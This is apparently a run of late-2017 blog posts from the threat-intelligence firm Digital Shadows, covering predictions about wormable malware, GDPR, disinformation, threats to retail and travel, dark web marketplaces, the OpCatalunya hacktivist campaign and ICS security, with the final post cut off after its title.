    • Wormable malware – Some of the biggest cyber incidents in 2017 revolved around the issue of self-replicating malware that can spread between networks. WannaCry and NotPetya were examples of this. As well as these we’ve seen the Bad rabbit ransomware that reportedly spreads via a combination of Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, and a wormable Trickbot banking trojan was also reported in Jul 2017.

    I expect malware modified with self-replicating capabilities to continue in 2018, particularly given the disruption caused by WannaCry and NotPetya inspiring similar attacks. Another driver for this is that many organizations around the world will be slow to mitigate against these methods, whether by applying appropriate patches and updates, restricting communication between workstations, and disabling features such as SMB to reduce the capability of malware to propagate within organization networks.

    The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    But whatever happens in 2018 and beyond, what is clear is that cybercrime will continue to be a problem and present governments, businesses and individuals with challenges to protect their data and their intellectual property. It is therefore critical that you take steps to manage your digital footprint and manage the digital risk you present to the World via your business activities in the internet and via cloud solutions. That way, when something bad does happen, you will know quickly and can deal with it more effectively.

    Why I Joined Digital Shadows: Product, Culture and Opportunity Wed, 13 Dec 2017 18:51:02 +0000 Making the decision to join Digital Shadows was actually a relatively straight forward decision for me, as it was impossible to turn down this unique opportunity.  My decision came down to 3 main factors – product, culture, and the opportunity ahead.

    Product and Timing:

    The space we operate in is growing, and maturing, rapidly. While others are concentrating their efforts solely on social media or dark web threats, Digital Shadows SearchLight™ offers unique insight into the risks facing an organization across the broadest range of areas in our industry. This extensive coverage, coupled with our intelligence analyst expertise, allows our clients to gain a full picture of their external digital risk, without false positives, and with mitigation options. This empowers practitioners in a way that was not possible before.

    Culture and People:

    Our Co-Founders, Alastair Paterson and James Chappell, have built a truly exceptional and unique team and culture at Digital Shadows.  The passion and enthusiasm that the whole company has for our SearchLight product and our clients is truly infectious.  Throughout the interview process I was pleasantly surprised at how consistently the vision of Digital Shadows was echoed by those I met.  The passion that the team has to ensure our clients are successful is key to our own success.  That passion, through our analysts that overlay our technology, make us truly unique in the market place.

    The Opportunity Ahead:

    The cyber security and digital risk industry is maturing quickly and we have a great opportunity through the Client Success team to differentiate ourselves from our competitors.  Through our SearchLight product and ability to build lasting trusted advisor relationships with our clients, we can ensure that their digital risks are clearly understood.


    I’m very excited about my next adventure, and look forward to creating a delighted client experience for everyone that chooses to work with us at Digital Shadows.

    A New CISO Looking to See How Deep the Rabbit Hole Goes Tue, 12 Dec 2017 17:10:06 +0000

    Well it is official, I’m now the Chief Information Security Officer here at Digital Shadows. It has been while since I was on the practitioner side of the house and my days defending networks at the University of Texas at Dallas seems like ages ago. When I was at Forrester Research, I often joked about how much easier it was to parachute in, give some industry analyst words of wisdom and then head back to the airport. It is much easier “to say” than “to do.”  The Heartbleeds, WannaCrys, and BadRabbits of the world are going to mean significantly more to me in my practitioner new role. It’s almost as if Morpheus is greeting me with a red pill, welcoming me back to the real-world.

    I’ve worked with many CISOs over the years. From the Forrester Leadership Boards, to our own Customer Advisory Board here at Digital Shadows, I’ve found myself in a position to give out security program suggestions and advice to CISOs. To be honest, I always felt like a bit of an impostor; giving advice to a security and risk leader when I hadn’t been one myself. Sometimes I felt analogous to that one friend without children, who gave out parenting advice on how to get a threenager to eat more vegetables. For those with kids you know exactly what I’m talking about. Why don’t you try walking a mile in my shoes before you give me your #protips.

    I’m grateful for the opportunity and I’m very excited about this new role as it demonstrates Digital Shadows’ commitment to our customers security and privacy. I’m also very appreciative for the CISO network I’ve built up over the years. I will definitely reach out to my new peers for guidance and support on this new path. I also plan to blog more about my journey in the hopes that I can share my personal lessons learned with any other first time CISOs looking for guidance. Stay tuned for more.

    Digital Shadows’ Most Popular Blogs of 2017: Analysis of Competing Hypotheses For The Win Tue, 12 Dec 2017 05:55:06 +0000

    This time last year, we looked back at the blogs that caught our readers’ attention the most. In 2016, it was our Analysis of Competing Hypotheses of the Tesco Bank incident that reached the top of the pile. In 2017, it was yet another ACH that topped the Digital Shadows blog charts.

    1. WannaCry: An Analysis of Competing Hypotheses

    In May, the WannaCry ransomware spread across computer networks across the world. Despite a range of explanations offered, there was a lot of confusion as to the actors behind the campaign and their objective(s).

    Using ACH, our analysts recorded their assumptions, evidence and hypotheses on one matrix. This identified the hypotheses that were least likely to be valid. (In the end, we actually posted an additional, updated ACH as more evidence emerged:

    This structured approach is significant as it facilitates easier collaboration and peer review. Indeed, we were happy to see others getting involved with ACHs, including SANS Internet Storm Center handler who did some excellent additional analysis on this area.

    ACH can’t be used in all circumstances, but the transparency it provides is useful and aligns with the values of intelligence tradecraft that Jim Marchio espoused in his paper ‘Analytic Tradecraft and the Intelligence Community: Enduring Value, Intermittent Emphasis’.

    For those ACH nerds out there, you can view all the ACH’s we’ve done here:

    1. Equifax Breach: The Impact for Enterprises and Consumers

    The was arguably the biggest story of 2017, so it’s only understandable that this blog attracted plenty of readers. When events like this break, it’s always tricky to find the correct balance of a quick response and providing accurate and useful information. We’ve found that transparency helps here and use the following structure:

    1. What we know
    2. What we don’t know
    3. What we expect to happen next

    By taking this approach, we can cut through the hype and identify intelligence gaps. It’s definitely a structure we’ll be using for future breaking events.

    For those interested in lessons we can learn from the Equifax breach, check out this short paper we published:

    1. Innovation in The Underworld: Reducing the Risk of Ripper Fraud

    The final of the top three blogs of 2017 focused on the cybercriminal ecosystem, and the mechanisms criminals have in place to detect fraud from other criminals.

    Those who commit this type of fraud are known as “rippers” and there are several mechanisms in place to protect against them, including and blacklists. One service, called ripper[.]cc is an innovative approach to identifying rippers, demonstrating how professionalized the cybercriminal ecosystem has become. Ripper[.]cc allows users to identify profiles that have been previously reported, and do so across different platforms. There’s even a Chrome plugin to make this even easier. You can read more about ripper[.]cc in this blog:

    Check out these three blogs and keep an eye out for the exciting research we have planned for 2018.

    Meet the New Wed, 29 Nov 2017 05:09:04 +0000 This morning we launched the new Digital Shadows website. Our main goal of creating this new website was to make it a valuable resource to the many security leaders and practitioners, board members, and executives who visit our website each day. We wanted to provide a view on how we are partnering with our customers to protect their company from digital risks across the open, deep, and dark web. These digital risks include cyber threats, data exposure, brand exposure, VIP exposure, infrastructure exposure, physical threats, and third party risk. We wanted to share these customers stories as we find that organizations both large and small, across every industry and geography, are all facing a similar and very hard task. The team here at Digital Shadows is incredibly focused on helping our customers solve these problems every day.

    We hope you enjoy our new website experience. Here are some highlights:

    1. Our new modern interactive home page with significantly more valuable content


    2. A deeper SearchLight portal experience so you can get a feel of how our service can help you monitor, manage, and remediate digital risks
    (Just scroll down on the Home Page)


    3. A more personalized experienced designed for your role, vertical, and company size


    4. A fantastic resource center that houses all of the great content our team has created that we hope is valuable to you

    Risks to Retail: Cybercriminals Sharing the Joy This Holiday Season Tue, 21 Nov 2017 23:41:33 +0000 Despite some early deals, Black Friday officially begins on 24th November, kick-starting over a month of consumer spending over the holiday period. This year, it’s expected that a whopping $862 billion dollars will be spent during this season. A significant chunk of this is online sales, with $116 billion set to be spent. Cybercriminals also look to get a slice of the holiday sales action.

     Cybercrime and the holiday season

    In our recent webinar and whitepaper, we identify cybercrime risks to retailers and consumers:

    1. Payment Systems Risk – How cybercriminals acquire payment card information, through Point of Sale (POS) malware and skimming.
    2. Fraudulent Transactions – The monetization of this payment card information, through Card Not Present (CNP) fraud and eGift cards.
    3. Account Takeover – Fraudsters that look to log in to consumers accounts, be that the retailers or payment platforms. Phishing and credential stuffing are prime techniques for this.
    4. Loss of Service – With so much money spent online, the threat of Distributed Denial of Service (DDoS) is a real threat to retailers. Cybercriminals know this and look to extort companies.

    Amid all of these risks, criminals look to help each other out. For example, in one instance, one actor on shared templates for phishing pages (Figure 1) in a criminal forum. This scam page is well made and has some interesting functionality, including the ability for victims to authenticate with ID cards and passport photos and auto-redirecting victims to the legitimate site.  With this template available for free, actors need only register a convincing-looking domain.

    scampage advertisement

    Figure 1: An advertisement for a phishing “scampage” on a criminal forum.

     ID upload feature screenshot

    Figure 2: A screenshot of the ID upload feature from a demonstration video, which allows attackers to harvest additional information.

    Fraudsters also share software. In Figure 3 we see the AntiDetect tool, which any carder worth their salt will be using. Carders know that retailers use device fingerprinting to detect fraudulent transactions, so the ability rotate and quickly change system components like browser type, version, language, time zone, and user agent. You can read more about this particular tool in an article by Brian Krebs.


    AntiDetect tool

    Figure 3: The AntiDetect tool to overcome browser fingerprinting controls.

     Of course, there are criminals that look to exploit this interest in tool-sharing by disguising malware as carding tools. Figure 4 is an example of an actor claiming to share such tools – in this case a PayPal email checker. Unsuspecting downloaders may get more than they bargained for when downloading this .exe file. It’s a cliché, I know, but there’s no honor amongst thieves.


    Criminal forum example

    Figure 4: A tool to “check email paypal” available for download and advertised on criminal forums.

    Nevertheless, with criminals so open to sharing so many tools and tactics, it’s a reminder to organizations to do the same; make use of sharing communities such as R-CISC and Infraguard to stay abreast of these latest criminal approaches.


    You can watch our webinar or download our latest whitepaper to learn more about these tactics and tools, as well as tips for retailers and consumers to follow in order to mitigate these risks.

    GDPR – Not Just a European Concern Mon, 20 Nov 2017 23:37:13 +0000

    This post originally appeared on SecurityWeek.

    Europe Data Privacy

    The recent Equifax breach that has been all over the news raises an interesting question: How would the situation have played out if it was after May 25, 2018 when the new General Data Protection Regulations (GDPR) are due to come into force? While none of us has a crystal ball, we can bet the outcome for Equifax would be even worse.

    This report provides comprehensive information on the GDPR but, in brief, the GDPR is a new set of regulations to protect the personal data and privacy of citizens of EU countries. It will affect any company that processes personal data of EU citizens – even if that company doesn’t have a presence in an EU country – making this legislation more than a European concern. To begin with, the regulations set a high standard for the speed with which businesses are required to report data breaches, in some cases within 72 hours after becoming aware of the breach. Companies also have to comply with each of these rights, transparently and without cost to EU citizens:

    • Right of data portability – if a customer asks for their data you are required to provide it
    • Right of removal – if a customer requests that their information be removed from your systems you are required to do so
    • Data transfer notification – prior to sharing customer data with a third party, you must notify the customer and gain explicit consent to share it
    • Customer access requests – if a customer asks whether or not you hold data on them, you are obligated to let them know

    To satisfy the GDPR regulations, companies will likely need additional processes, technology and personnel in place. In a survey by PwC of U.S. companies, nearly 70% of respondents said they plan to spend between $1 million and $10 million to address GDPR obligations. While that may sound like a lot, it could pale in comparison to fines. Failure to comply with the GDPR can result in hefty financial penalties of up to 4 percent of global turnover or 20 million Euros (more than $23 million), whichever is greater in certain instances. For companies operating with razor-thin margins, profits could easily evaporate into thin air.

    The need to comply with data privacy regulations is nothing new to U.S.-based companies. In fact certain states like California and Delaware have particularly strict rules around online data privacy. Further, the U.S. Department of Commerce has worked for some time to synchronize privacy legislation between the U.S. and the U.K. so that trade (mostly online) can be conducted successfully in the joint interest of both groups. This led to the creation of the EU-U.S. Privacy Shield Framework designed to give concurrency to protection, meaning the same level of protection for EU citizens whether in the EU or the United States.  Companies based in the U.S. can self-certify that they provide “adequate” privacy protection and then must comply with the Framework’s requirements.

    GDPR continues some of the core principles set out by this earlier legislation which helps ease the transition for companies that have maintained compliance. But differences including the 72-hour reporting deadline, exactly how ‘personal information’ is defined and the broader rights granted to EU citizens must be considered. So what can U.S.-based companies do to prepare for the GDPR? These five steps can help:

    1. Understand what data you have and where it is. Make sure you understand what data you hold on EU citizens.  If you don’t hold data on EU citizens then you need not concern yourself with the GDPR, but given the global nature of business this is unlikely to be the case. If you do hold EU citizen data then consider this: every company has a certain amount of data loss, yet many aren’t aware that they’ve already been breached. If you don’t already do so, proactively monitor sites on the open, deep and dark web for your customers’ information. Understanding any data leaks and addressing them now will give you a clean start when the GDPR goes into effect next year.
    2. Engage in supply chain security. Most businesses have a long supply chain. For example, it isn’t unusual for a Tier 1 financial institution to have 15,000 suppliers/partners who quite often hold proprietary information on the institution’s customers. Under the GDPR, both data controllers and data processors have protection and privacy obligations to EU citizens. Make sure your company’s security guidelines and controls with suppliers are adequate and that your suppliers are in compliance and following best practices.
    3. Complete the EU-U.S. Privacy Shield self-certification process. It is still unclear whether or not the EU-U.S. Privacy Shield Framework will continue. However, companies that are self-certified when the GDPR goes into effect can demonstrate a commitment to protecting the data and privacy of EU citizens. This puts you further down the path of compliance with the GDPR and on more solid footing to continue business with EU companies and citizens during the transition.
    4. Establish GDPR compliance processes now. You need to establish and test processes in advance to ensure you know how and who to notify in the event of a breach. With only 72 hours to spare, you can’t afford to wait and figure it out ‘on the fly.’ Additionally, make sure you have identified processes to support all the other rights of EU citizens under the GDPR including data portability, removal, transfer notifications and access requests. Consider appointing a data protection officer to oversee these efforts.
    5. Seek legal counsel. All of these changes require considerable thought, time and effort. Before you go too far down the path of implementing processes and any supporting technologies required, seek professional legal advice to ensure that your chosen approaches suitably address the legislation.

    Crystal ball or not, it’s clear that the GDPR is not just a European concern. What’s not yet clear is how quickly or severely the Information Commissioners Office will treat non-compliances in the early part of the legislation. Regardless, given the scope of requirements, affected U.S.-based companies should start to prepare now to mitigate risk.

    Fake News is More Than a Political Battlecry Thu, 16 Nov 2017 23:25:03 +0000 This week, British Prime Minister Theresa May came out and attacked Russia’s attempt to “weaponize information” in hostile actions against western states. This comes on the back of a wave of news that’s covered “fake news” and the U.S. elections. At the latest count, Russia-linked Facebook posts reached 126 million users during the U.S. election period. This makes great headlines and fascinating reading, but what does it all mean?

    We must remember that the use of social media bots is nothing new. Nor is influencing elections; using social media to influence the outcomes of elections isn’t event particularly new.

    Our latest paper covers four areas:

    1. Disinformation is different than fake news;
    2. Disinformation campaigns have financial motivations too;
    3. There are a wide range of tools available, which extend beyond social media;
    4. Understanding these motivations and tools allows us to look disrupt disinformation campaigns.

    Disinformation Whitepaper


    Let’s get a boring, semantic (yet important) clarification out of the way. Fake news and disinformation are different, albeit related, terms. The confusion between the two terms holds us back from having a sensible conversation.

    Fake news refers to all manner of things, including disinformation campaigns, partisanship, and honest journalist errors. Disinformation campaigns are specifically those that deliberately spread false information in order to deceive their target or audience.

    One of the greatest quotes on this comes from the former Director of Department X for the East German foreign intelligence: “Our friends in Moscow call it ‘dezinformatsiya’. Our enemies in America call it ‘active measures,’ and I, dear friends, call it ‘my favorite pastime.’”

    This need not be limited to the geopolitical sphere, it can apply to ideological and financial motivations too.


    It would be wrong to assume that the sole target of disinformation campaigns is the electorate and political parties. Given how easy it is to access and wield these online tools, organizations can easily be slandered and their share prices can change. We’ve seen such activities already, particularly surrounding BioTech companies and accusations about the role of Martin Shkreli and an online actor named Art Doyle.

    Actors might not even need to get into the weeds of these tools. TheInsider is a dark web “Pump and dump” service that encourages users to invest in their scheme. The scheme itself looks to manipulate interest in cryptocurrencies to pump up the price and sell shares for profit.


    Disinformation TheInsider

    Regardless of the motivation behind disinformation campaigns, these do not happen in isolation. Instead, malicious actors take advantage of a wide range of tools available at a very lower barrier to entry.


    Digital Shadows’ Disinformation Campaign Taxonomy is based on a three-stage attack chain (creation, publication, and circulation), which includes an overview of the methods, tactics and tools associated with running such an operation.

    Taxonomy of Disinformation

    By using Digital Shadows’ Disinformation Campaign Taxonomy, we can see that there are different stages that defenders can target to help disrupt disinformation campaigns in their infancy. Early identification of these campaigns is critical to increase the likelihood of successful disruption.

    Download a copy of our latest research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.

    Why “Have a Safe Trip” Is Taking On Greater Meaning Tue, 14 Nov 2017 23:19:04 +0000 This post originally appeared on SecurityWeek.

    Have a safe trip! Typically, when we wish someone well before they leave on a journey we are referring to their physical safety while in transit. But, increasingly, there’s another consideration – their online security.

    Over the past year, compromises of payment card data from Point-of-Sale (POS) systems, network intrusions against third-party suppliers, and cyber espionage campaigns against visitors using hotel Wi-Fi networks have plagued the travel and hospitality industries. In the spirit of “forewarned is forearmed,” let’s take a closer look at some of the most notable examples of each of these types of threats and how firms in these industries can mitigate risk.

    POS attacks:

    Financially-motivated actors seeking to compromise payment card details use malware to extract this data from POS systems or devices as well as physical skimming devices. Based on the 20 POS malware variants that have been documented and numerous reports of breaches, the travel and hospitality industries have been under siege. In the last six months alone a new variant, MajikPOS, and modifications to the RawPOS variant and the Zeus banking trojan targeting POS systems, have emerged. Since August 2016, POS attacks have reportedly affected 37 Best American Hospitality Corporation restaurants, 62 Kimpton hotel locations and an unknown number of Chipotle Mexican Grill locations. Threat actors focused on these industries include FIN7, TA530 and Vendetta Brothers who each use a range of tactics, techniques and procedures (TTPs). As an example, the threat group FIN7 targets the hospitality industry through the following TTPs:

    • Spearphishing emails containing malicious Microsoft Office documents
    • Social engineering methods to ensure targets open an attachment and initiate the infection process
    • Macro-enabled documents that download initial backdoor payloads onto recipient machines to allow for continued access to systems
    • Malware to move laterally through compromised networks

    Network intrusions:

    The most high-profile network intrusion in the past year involved a compromise of the Sabre Corporation, reportedly affecting at least eight hospitality companies. Through unknown means, the attackers had accessed account credentials that permitted access to payment card data and information for some reservations processed by Sabre’s central reservation system. The company stated that not all compromised records included CVV numbers, and no personal information, such as social security numbers, passport numbers, or driver’s license numbers were accessed. This attack demonstrates a trend of third-party supplier attacks in which financially-motivated actors impact multiple companies by compromising their supplier to access sensitive or valuable data.

    Wi-Fi network compromise:

    Threat actors have also targeted hotel Wi-Fi networks in an information gathering and cyber espionage campaign against travelers to Europe and the Middle East. Threat actors almost certainly choose to target these networks because they are deemed less secure and can be leveraged to perform additional actions, such as stealing credentials and moving laterally within networks. In this particular campaign, spearphishing emails were used to deliver information-harvesting malware to victims. The attackers also purportedly used the EternalBlue exploit, which targets the vulnerable Microsoft Server Message Block (SMB) protocol for lateral movement within target networks.

    So what can you do to mitigate risk?

    Layer security:

    • While the Europay, Mastercard and Visa (EMV) chip technology has made physical card fraud more difficult, online card spending is on the rise. Consider using 3D Secure as an additional layer of security which has proven to be a real obstacle for criminals and is deployed by Visa and Mastercard.
    • To prevent lateral movement once inside the network, restricting workstation-to-workstation communication by using host-based firewall rules is also encouraged where feasible.
    • Implement an enterprise password management solution – not only for secure storage and sharing but also strong password creation and diversity to mitigate the risk of credential compromise.


    • With the help of Google Alerts or open source web crawlers like Scrapy, monitor for mentions of your company on cardable websites (sites that track those that are susceptible to fraudulent purchases as a result of lax security controls).
    • Monitor for mentions of suppliers’ names on the open, deep and dark web to help identify if key partners are being targeted by threat actors and if such activity may put your organization at risk.
    • Proactively monitor for credential dumps relevant to your organization’s accounts.


    • Routinely train employees about the risks of spam and spearphishing and how to avoid becoming a victim.
    • Because employees often reuse corporate credentials for personal use, establish and communicate policies that restrict which external services are allowed to be associated to corporate email accounts. Encourage staff to use consumer password management tools like 1Password or LastPass to also manage personal account credentials.

    Address vulnerabilities:

    • Patching is an important part of your defense strategy and failing to do so opens the door wide for adversaries. For example, Microsoft has issued a patch for the vulnerabilities exploited by EternalBlue. Application of these patches prevents the exploitation of the SMB network service.
    • Proper configuration is also critical. In the case of the SMB service, TCP port 445 should not be reachable from the public Internet; where external access to SMB is required, a VPN or IP address whitelisting should be used to restrict access. SMB traffic should, ideally, not be permitted to egress from an organization’s network to the public Internet.

    As long as payment card details and other proprietary information remain lucrative on criminal forums and marketplaces, the travel and hospitality industry need to remain vigilant. But with greater awareness about POS system attacks, operations against third-party suppliers, and the vulnerabilities of public or semi-public Wi-Fi networks, companies can do a lot to mitigate risk and ensure safer journeys for travelers.

    Know Where to Find Your Digital Risk Fri, 10 Nov 2017 22:12:23 +0000 This post originally appeared on SecurityWeek. Read more from CEO Alastair Paterson.

    Approximately 250 years ago Samuel Johnson said, “The next best thing to knowing something, is knowing where to find it.” This is quite a fitting quote from the author of A Dictionary of the English Language and equally fitting today when it comes to understanding your digital risk.

    There’s a great deal of intelligence organizations can find on the deep and dark web.  Credit card numbers, bank account information, patient information and intellectual property are widely known to be for sale on forums. Now some of the intelligence is more eye opening. We’re seeing W-2 forms , and employee credentials available, making any organization ripe for tax fraud or account takeover, respectively.

    One of the most popular marketplaces on the dark web for such information is AlphaBay. Not only is information related to a company’s assets available, but information about new techniques to compromise targets is for sale as well. One of the latest is a tool to bypass SMS account verification, making multi-factor authentication that relies on SMS vulnerable.  On such forums you can also find configuration files for credential stuffing tools, like Sentry MBA, that are created for account takeover of specific companies. There are dozens of marketplaces on the dark web and competition for business is steep. In fact, some less popular marketplaces offer botnets devised to spam AlphaBay users with advertisements or special promotions in an attempt to entice them to switch forums. Not all dark web sources are as readily accessible as AlphaBay, of course. Some require human analyst expertise to also gain access to closed sources to get the most relevant view of the risks.

    But for all the notoriety of these marketplaces, it is also important to remember that criminal activity isn’t limited to the dark web, particularly given the fact that some countries don’t extradite cybercriminals. With minimal consequences, bad actors have no incentive to hide. As a result, cybercrime is an Internet-wide problem, almost equally present on the deep and open web. is a prime example. This all-in-one outsourced online shop provides hosting, design (based on WordPress-like templates) and a payment solution. Additional items for sale on the marketplace include:

    • Bot-registered social media accounts (usually sold in bulk), typically with the intent of supporting social media spam and artificially increasing the popularity of other accounts/posts
    • Stolen, legitimate social media accounts, which are advertised in small quantity but at higher prices compared to bot-registered accounts
    • “Coupons” to services that artificially increase the popularity of social media accounts or posts
    • Stolen accounts from other services including banks, payment, and gift and loyalty cards
    • Dedicated servers and domain names

    The point is that criminal forums exist everywhere so focusing only on the dark web won’t give you a comprehensive view of your digital risk. Furthermore, it isn’t enough to simply detect mentions of company assets and concerns. You need context behind the information you see posted to have a better understanding of the actual risk to your organization. This requires a combination of technology and people.

    • Automated collection technology can provide visibility into incidents with context, as they happen, wherever they happen – across the open, deep and dark web. For example, being able to see previous posts by other users on the marketplace on the same thread or post can provide a deeper understanding of how your company, employees or customers may be impacted. It can also provide an overview of the user in question, with their name, data joined, activity levels and reputation.
    • Data scientists and intelligence experts are able to gain access to some closed sources that collection technology alone can’t penetrate and they need to be involved in qualifying the data collected. With enhanced analytic capabilities and additional context they can help determine the potential impact to the organization, a possible timeline of events, and recommended action.

    A comprehensive assessment of your digital risk starts with knowing where to find it. With an approach that combines technology and human experts looking across the open, deep and dark web, you can understand not only where and when you are mentioned online, but also why, by whom and the likely impact to your organization. This breadth and depth of coverage is essential to protect against threats associated with forums and marketplaces and, ultimately, to formulate a successful digital risk management strategy.

    Pwnage to Catalonia: Five Things We Know About OpCatalunya Thu, 02 Nov 2017 21:00:08 +0000 Since October 24th, Digital Shadows has observed an increase in attack claims and social media activity associated with the OpCatalunya (OpCatalonia) hacktivist campaign. Given the ongoing tensions between Catalonia and Madrid, we expect online activity to continue for the next few weeks at least. Here are five things all organizations with operations in Spain need to know about the campaign:

    1. What is OpCatalunya?

    OpCatalunya was established in late September 2017 by affiliates of the Anonymous collective in response to ongoing political and social tensions between the Catalonian autonomous community and Spain’s Madrid government. Catalonia held an independence referendum on October 1st that was subsequently declared “illegal” by the Spanish government. Although we observed a small number of references to the hashtag OpCatalunya on social media before late September, these were not related to the incumbent hacktivist campaign of the same name and instead pertained to long-running tensions between the region and central government, which dates back to the nineteenth century.

    2. Who is Involved? 

    Although the campaign is most closely associated with the Anonymous collective, particularly its Spanish iteration (Anonymous Spain), other hacktivist actors and groups, including Shadow Sec team, Team Poison, F Security and other branches of the Anonymous collective such as Anonymous France, Anonymous Albania, Anonymous Belgium and Anonymous Germany have either taken part of pledged their support.

    3. What Activity Have We Seen?

    The campaign initially called for attacks against Madrid-based government and law enforcement websites; however, there has been a widening of targeting to include education, media, and financial services organizations across Spain. As well as several denial of service (DoS) and data leak attacks against Madrid government sites, Anonymous Spain made DoS attack claims against the Spanish royal family’s website and that of Real Madrid Club de Fútbol, the latter due to its historic ties to the royal family and former Francoist regime. Other supporters of the campaign called for attacks against media companies perceived as providing partisan and anti-Catalan reporting, including El Mundo, Marca, El Pais, Pris and Grupo Planeta. Organizations that do not primarily operate out of Madrid have also been targeted; we detected DoS attack claims made against Banca March, a Spanish bank headquartered in Palma de Mallorca. There were also data exposure attacks conducted against websites belonging to the University of Malaga and Federation of Canary Islands, as well as a defacement of the Faculty of Sciences at the University of Cordoba website.

    Given the political and nationalist motives of this campaign, social media activity for OpCatalunya was strongly influenced by developments on the ground. The rise in attack claims in the second half of October 2017 occurred alongside a surge in social media mentions of OpCatalunya and its associated hashtags. Social media mentions grew dramatically following an announcement on October 19th by the Madrid central government that direct rule would be imposed on Catalonia.

    OpCataluyna 3

    OpCatalunya Twitter activity for Oct 2017

    4. Am I At Risk?

    As targeting for this campaign had expanded beyond government and law enforcement, we assess that all Spanish organizations principally operating out of Madrid are at increased risk of attack. Moreover, OpCatalunya supporters are often opportunistic and not necessarily focused on organizations ostensibly aligned to the central state. Therefore, all organizations with Spanish operations are likely seen as potential targets, though the success of such attacks would often rely on the security posture of these organizations, with attackers typically conducting data exposure attacks and website defacements against low hanging fruit.

    Although very few foreign companies have been targeted thus far, attackers may eventually move towards high-profile internationally recognized targets operating in Spain as a means of further publicizing their cause, particularly given the current impasse over Catalonian independence. The threat to foreign companies would also increase if they were perceived to have close affiliations with Madrid authorities – for example by publicly denouncing the Catalonian right to self-determination, displaying positive sentiment to the actions of central government, or threatening to move business operations out of Barcelona.

    Despite displaying high levels of intent, the capability of OpCatalunya participants is typical of most hacktivist campaigns, primarily consisting of relatively unsophisticated data exposure attacks (likely conducted via SQL injection techniques that are popular among hacktivists), website defacements and DoS attacks. Therefore, the capability of OpCatalunya participants is assessed as low to moderate at the time of writing.

    5. What Else Can We Expect?

    OpCatalonia supporters have explicitly expressed their desire to conduct further attacks, namely a DoS attack against Spanish Internet infrastructure on November 12th. While no further information was provided by the OpCatalonia Twitter account, Internet service providers (ISPs) operating in Spain would be the most probable targets.

    OpCataluyna 2

     OpCatalonia Twitter announcement

    OpCatalunya has already garnered the support of other participants from the wider Anonymous collective and beyond. We may see additional groups lend their support to the campaign, either out of solidarity for nationalist independence movements or to further their own cause. Forbes published an article on October 16th that claimed the Russian state was actively supporting Catalonian independence to sway public opinion in favor of its annexation of Crimea in 2014, which Russia maintains was a legitimate independence movement from Ukraine. While we detected no indication that Russia or other nation state actors had attempted to influence the Catalonian independence campaign through cyber activity, the prospect of this occurring in future was a realistic possibility.

    Digital Shadows has put in place a dedicated monitoring capability for this campaign. We will update accordingly should there be any significant change in targeting or increase in activity.

    ICS Security: Strawmen In the Power Station Tue, 31 Oct 2017 20:53:56 +0000 Congrats, it is now almost November and we have nearly made it through Cyber Security Awareness month (and what a month it has been). The theme for this final week is: “Protecting Critical Infrastructure from Cyber Threats.”

    For the purposes of this blog, I want to discuss two strawmen views of Industrial Control Systems (ICS) Security which, unfortunately, are both prevalent in many discussions around the topic of critical infrastructure protection:

    1. Doom’n’Gloomers: this is the “sky is falling” view of ICS security, often from people with an IT security background, who are appalled by lack of patches, outdated Operating Systems and lack of traditional IT security controls
    2. Airgappers: this is the view that ICS security is in a good place due to the airgapped nature of ICS systems and the lack of understanding of attackers of the complexities of ICS systems

    My opinion is that both views are partially accurate and that the reality of ICS security is nuanced and appreciation of that nuance is essential for making security decisions about those systems.

    A recent study claims that “One third of OT [Operational Technology] networks are exposed to cyber attacks” mainly due to the ICS systems having some form of internet connectivity, usage of unpatched or unpatchable systems and lack of encryption for passwords. These are all valid concerns. Which strawman argument is right, Doom’n’Gloomers or Airgappers? There are arguments on both sides:

    1. Almost all systems require some degree of internet connectivity in the modern era. While airgaps sound desirable due to their strong security properties, there are serious challenges to their usage: they cannot be updated, the data they collect cannot be exported and they cannot be remotely debugged in case of an issue. In a statement before the Subcommittee on National Security, Homeland Defense, and Foreign Operations in 2011 Sean McGurk, the Director of the Control Systems Security Program, stated that: “In our experience in conducting hundreds of vulnerability assessments in the private sector, in no case have we ever found the operations network, the SCADA system or energy management system separated from the enterprise network.” Despite the absence of complete airgaps, ICS networks are often firewalled or segmented off from the main enterprise network. Frameworks like NIST 800-82r2 and centers like CPNI (Critical Protection of National Infrastructure) have guidance around the deployment of firewalls for ICS systems, for example. We hope this guidance is followed.

    2. The continuing use of Windows XP past it’s End of Life is a concern due to any new security vulnerabilities which are discovered are not being patched. Even though Microsoft issued an emergency patch for the ETERNALBLUE exploit (MS17-010), its deployment in ICS systems is likely not widespread due to the difficulties involved with patching systems where Availability is the key concern. These systems do have vulnerabilities. But the ease of exploitation of these vulnerabilities is not as often discussed. ICS systems often have physical security controls, for example, only accessible from rooms which have physical access control and closed-circuit television (CCTV.) Unfortunately, many support contracts do not allow companies to upgrade or modify software without vendor approval, thereby extending the time required to patch.

    3. Legacy equipment which is incapable of encrypting passwords or the misconfiguration of equipment which is capable is certainly an issue. However, as mentioned previously, access to control networks is not as straightforward as access to enterprise network for an attacker. While there are some ICS systems which are connected to the Internet, it is rare to find the Human-Machine Interface (HMI) for a power station easily accessible. Often, they are connected to other systems via leased lines or a VPN. Additionally, the knowledge and skills to compromise an ICS system itself, rather than its surrounding IT infrastructure, are rare. Robert M. Lee and others helpfully distinguish intrusions into ICS system into two steps: Step One: Network Access and Step Two: Operation Access. Compromise of the enterprise network would be Step One. The access to the operational networks, Step Two, and then being able to use that access has been publicly documented in only two cases: Stuxnet and BlackEnergy/CRASHOVERRIDE. While such attacks are a concern, they are far from an everyday occurrence.

    One final point which is worth bearing in mind is the level of monitoring of ICS systems that is typically in place. Power stations and other systems which are safety critical and are monitored closely by operators. Response procedures are also present. Even in the case of the attack against the Ukrainian power network in December 2015, the power was out for a maximum of 6 hours before the Prykarpattyaoblenergo Company successfully restored power.

    As with many issues in cyber security, we see an evolutionary arms-race playing out between attackers and defenders with each side attempting to gain the upper hand. As for our strawmen, both have their good points, they should remind us of what the strengths and weaknesses of ICS systems are together with a cautionary note to not be complacent.

    Extorters Going to Extort: This Time Other Criminals Are the Victims Thu, 26 Oct 2017 15:52:27 +0000

